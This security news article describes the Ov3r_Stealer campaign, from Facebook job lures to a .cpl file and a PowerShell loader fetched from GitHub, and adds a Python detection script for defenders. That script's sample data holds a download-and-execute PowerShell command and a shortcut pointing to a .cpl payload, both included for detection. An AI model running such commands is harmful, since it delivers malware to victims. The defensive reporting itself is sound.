Bogus Facebook job postings are being used by threat actors as a lure to trick potential victims into downloading a new Windows stealer malware known as Ov3r_Stealer.
According to a report shared with The Hacker News by Trustwave SpiderLabs, "this malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors."
Ov3r_Stealer can extract information on the compromised host's hardware, passwords, credit card details, auto-fills, browser extensions, cryptocurrency wallets, Microsoft Office documents, and antivirus software installed.
Although the campaign's precise objective is unknown, the stolen data is likely sold on to other threat actors. Another possibility is that Ov3r_Stealer will eventually be modified to function as a loader for additional payloads, such as ransomware, much like QakBot.
The attack begins with a malicious PDF file that appears to be hosted on OneDrive and prompts users to click an embedded "Access Document" button.
Trustwave said it found the PDF file being distributed via Facebook advertisements for digital advertising positions and via a fake account impersonating Amazon CEO Andy Jassy.
Clicking the button delivers a web shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord's content delivery network (CDN). The shortcut in turn points to a control panel item (.CPL) file, which is executed via the Windows Control Panel process binary ("control.exe").
Once the CPL file runs, it downloads a PowerShell loader ("DATA1.txt") from a GitHub repository, which ultimately launches Ov3r_Stealer.
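As an added illustration of how a defender might hunt for the chain described above (example code written for this page, not Trustwave's tooling or anything from the report), the Python sketch below parses the .URL shortcut format to flag targets that are executables or control-panel items rather than documents, then runs two checks over process-creation events: control.exe loading a .cpl from outside System32, and PowerShell spawned by the CPL host fetching from GitHub. The sample shortcut, the events, the Discord and GitHub paths, and the shape of the PowerShell command line are all constructed assumptions; the only elements taken from the article are the .URL to control.exe/.cpl to PowerShell to GitHub sequence and the DATA1.txt filename. It also assumes PowerShell appears as a child of control.exe or rundll32.exe, the usual host processes for a .cpl.

```python
"""Hunt for an Ov3r_Stealer-style chain: .URL -> control.exe + .cpl -> PowerShell -> GitHub.

Example code for illustration only; all sample data below is constructed."""
import re
from configparser import ConfigParser

# Constructed .URL web shortcut (Windows Internet Shortcut files use INI layout).
# The target URL is an assumption shaped like the lure in the article, not an
# indicator from the report.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=https://cdn.discordapp.com/attachments/111/222/DocuSign_Document.cpl
IconIndex=3
"""

# File extensions a "document" shortcut should never resolve to.
EXECUTABLE_EXT = (".cpl", ".exe", ".dll", ".scr", ".hta", ".js", ".vbs", ".lnk")


def parse_url_shortcut(text: str) -> str:
    """Return the URL= target of a .URL file, or '' if the file has none."""
    cp = ConfigParser(interpolation=None)  # URLs may contain '%' sequences
    cp.read_string(text)
    return cp.get("InternetShortcut", "URL", fallback="")


def shortcut_is_suspicious(text: str) -> bool:
    """True when the shortcut's target (ignoring any query string) is executable content."""
    target = parse_url_shortcut(text).strip().lower()
    path = target.split("?", 1)[0]
    return path.endswith(EXECUTABLE_EXT)


# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# The GitHub account/repo path is a placeholder, not the one named in the article.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" "C:\Users\victim\AppData\Local\Temp\DocuSign_Document.cpl"'},
    {"parent": "rundll32.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "iex (iwr https://raw.githubusercontent.com/example/repo/main/DATA1.txt).Content"'},
    {"parent": "explorer.exe", "image": "control.exe",  # benign: built-in applet
     "cmdline": r'"C:\Windows\System32\control.exe" "C:\Windows\System32\ncpa.cpl"'},
    {"parent": "explorer.exe", "image": "powershell.exe",  # benign: admin script
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

# Drive-letter path ending in .cpl; does not handle paths containing spaces.
CPL_PATH = re.compile(r'(?i)[A-Za-z]:\\[^"\s]+\.cpl')
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
GITHUB_FETCH = re.compile(r"(?i)https?://(raw\.githubusercontent\.com|github\.com)/")


def control_loads_foreign_cpl(ev: dict) -> bool:
    """control.exe handed a .cpl that does not live in a Windows system directory."""
    if ev["image"].lower() != "control.exe":
        return False
    return any(not p.lower().startswith(SYSTEM_DIRS) for p in CPL_PATH.findall(ev["cmdline"]))


def cpl_spawned_powershell_to_github(ev: dict) -> bool:
    """PowerShell child of a CPL host process whose command line pulls from GitHub."""
    return (ev["image"].lower() in ("powershell.exe", "pwsh.exe")
            and ev["parent"].lower() in ("control.exe", "rundll32.exe")
            and GITHUB_FETCH.search(ev["cmdline"]) is not None)


def hunt(events: list) -> list:
    """Return (event index, reason) pairs for every event matching either check."""
    findings = []
    for idx, ev in enumerate(events):
        if control_loads_foreign_cpl(ev):
            findings.append((idx, "control.exe running a .cpl from outside System32"))
        if cpl_spawned_powershell_to_github(ev):
            findings.append((idx, "PowerShell spawned by a CPL host fetching from GitHub"))
    return findings


if __name__ == "__main__":
    print("shortcut suspicious:", shortcut_is_suspicious(SAMPLE_URL_FILE))
    for idx, why in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {why}")
```

Both checks are deliberately narrow so they stay quiet on legitimate Control Panel applets and ordinary PowerShell scripts; in a real environment the .cpl path check would be extended to catch UNC and WebDAV paths as well.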
Facebook Job Postings
It's worth noting that Trend Micro recently revealed that threat actors used a nearly identical infection chain to drop another stealer, known as Phemedrone Stealer, by exploiting a Microsoft Windows Defender SmartScreen bypass vulnerability (CVE-2023-36025, CVSS score: 8.8).
The two campaigns also share the same GitHub repository (nateeintanan2527), and there are code-level overlaps between Ov3r_Stealer and Phemedrone.
"This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r_Stealer," Trustwave said. "The main difference between the two is that Phemedrone is written in C#."
The findings come as Hudson Rock revealed that threat actors are using credentials stolen through infostealer infections to advertise access to the law enforcement request portals of major companies including Google, TikTok, Binance, and Meta.
They also coincide with the emergence of a class of infections dubbed CrackedCantil, which use cracked software as the initial entry point to drop loaders such as PrivateLoader and SmokeLoader. These loaders then serve as a vehicle for distributing ransomware, crypto miners, information stealers, and proxy botnets.